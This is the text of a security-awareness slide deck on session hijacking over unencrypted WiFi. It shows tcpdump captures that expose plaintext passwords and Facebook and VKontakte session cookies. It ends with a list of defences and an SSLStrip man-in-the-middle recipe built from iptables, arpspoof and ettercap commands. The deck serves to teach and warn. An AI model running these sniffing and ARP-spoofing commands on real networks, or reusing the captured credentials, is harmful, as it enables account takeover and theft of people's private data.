1

session hijackingfor dummies

Friedemann Wulff-WoestenWDCM Dresden

2

What is this all about?

• especially in the czech republic: unencrypted WiFi everywhere

• Facebookfor many people THE platform to communicate

• many mobile devices have Facebook Appseven more data = possibilities to attack

• problem: almost no one types https://browser always connects to Port 80

3

What is this all about?

• this is a serious security threat

• tools are freely available, no one cares

• Facebook ignores the problem

• Google went Full SSL

4

HTTP is stateless

• Request, Response

• Send username/password once

• Receive cookie

• Use cookie for all future requests

5

Cookies need to be kept secret

6

7

8

even better: WiFi

• Cookies shouted through the air

• Someone just has to start listening

imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80

tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes

[...]

17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50E..f.v@.@.3.....Q....f.P.V.6)!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort

[...]

9

let’s listen...

POST /login.php?login_attempt=1 HTTP/1.1Host: login.facebook.com

email=e2@eisenrah.com&pass=ichmagdietu

10

Example: Request

HTTP/1.1 302 FoundLocation: http://www.facebook.com/home.php?Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly

11

Example: Response

12

Problem: AJAXgenerate session cookies without clicking anywhere

17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1Host: q63.queue.vk.comConnection: keep-aliveReferer: http://q63.queue.vk.com/q_frame.php?3Content-Length: 307Origin: http://q63.queue.vk.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1Content-Type: application/x-www-form-urlencodedAccept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: remixchk=5; remixlang=0;

remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840

13

tcpdump: В Контакте

21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254E.....@.@.e@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1Host: 0.44.channel.facebook.comConnection: keep-aliveReferer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.jsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw;

sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952

14

tcpdump: Facebook

15

facebook.js changes

16

What can you do?

• always full SSL - type https:// in address bar

• click “Log out”(doesn't guarantee session is invalidated)

• use at least WPAII

• use a VPNe.g. https://webvpn.zih.tu-dresden.de/

17

Even worse

• Facebook-Like Button, Tweet-Buttons (included in many blogs - cookies sent with HTTP)

• dirty: active attack with SSLStrip(redirects every HTTPS request to HTTP)

sudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

sslstrip -l 1000ip route show | grep default | awk '{ print $3}'arpspoof <gatewayIP>ettercap -Tzq

18

Example: SSLStrip

19

friedemann@wulff-woesten.de

http://wiki.eisenrah.com/wiki/Sessions

20

@cdine@codebutler

@eisenrah

@moxie__

21

Sources

• elmo and cookie monsterhttp://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg

• wireshark collagehttp://www.flickr.com/photos/43707902@N04/4022449442/http://www.flickr.com/photos/43707902@N04/4022445684/http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png

• wireshark screenshothttp://dump.taylor-hughes.com/wireshark-tadalist.png

• firesheep facebook.js screenshothttp://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/NWl1KI5PCWA/s1600/Screenshot-9.png